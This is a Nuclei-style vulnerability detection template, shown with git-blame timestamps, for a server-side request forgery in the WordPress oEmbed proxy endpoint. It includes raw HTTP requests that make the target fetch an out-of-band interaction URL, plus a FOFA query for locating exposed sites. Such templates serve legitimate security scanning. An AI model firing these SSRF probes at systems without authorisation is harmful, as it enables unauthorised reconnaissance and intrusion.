2021-12-16 13:48:34 +05:30
id : wordpress-ssrf-oembed
info :
2023-09-04 23:43:10 +05:30
name : Wordpress Oembed Proxy - Server-side request forgery
2021-12-16 13:48:34 +05:30
author : dhiyaneshDk
2021-12-16 14:25:00 +05:30
severity : medium
2024-01-02 21:15:12 +05:30
description : The oEmbed feature in WordPress allows embedding content from external sources, and if it's not properly secured, it could be exploited for SSRF.
2021-12-16 13:48:34 +05:30
reference :
- https://book.hacktricks.xyz/pentesting/pentesting-web/wordpress
- https://github.com/incogbyte/quickpress/blob/master/core/req.go
2024-09-10 14:38:16 +05:30
classification :
cpe : cpe:2.3:a:wordpress:wordpress:*:*:*:*:*:*:*:*
2023-04-28 13:41:21 +05:30
metadata :
2023-09-04 18:22:21 +00:00
max-request : 2
2024-09-10 13:52:50 +05:30
vendor : wordpress
2024-09-10 14:38:16 +05:30
product : wordpress
fofa-query : body="oembed" && body="wp-"
2023-09-04 23:43:10 +05:30
tags : wordpress,ssrf,oast,oembed
2021-12-16 13:48:34 +05:30
2023-04-27 09:58:59 +05:30
http :
2023-09-04 23:43:10 +05:30
- raw :
- |
GET /wp-json/oembed/1.0/proxy HTTP/1.1
Host : {{Hostname}}
- |
GET /wp-json/oembed/1.0/proxy?url=http://{{interactsh-url}} HTTP/1.1
Host : {{Hostname}}
2021-12-16 14:25:00 +05:30
2023-09-03 07:13:32 +08:00
matchers-condition : and
2021-12-16 13:48:34 +05:30
matchers :
2023-09-04 23:43:10 +05:30
- type : word
part : body_1
words :
- 'rest_missing_callback_param'
2023-09-03 07:13:32 +08:00
2023-09-04 23:43:10 +05:30
- type : word
part : interactsh_protocol # Confirms the HTTP Interaction
words :
- "http"
2024-12-01 13:57:55 +00:00
# digest: 4a0a004730450220380807c5f0961ca3a0a8acf4284058bd0dad703b3224b3b78973a90080317ed5022100db4a5d19b583e1c15225bfefbcd8fefee61c83b612ecf43d8916094cf83b110b:922c64590222798bb761d5b6d8e72950
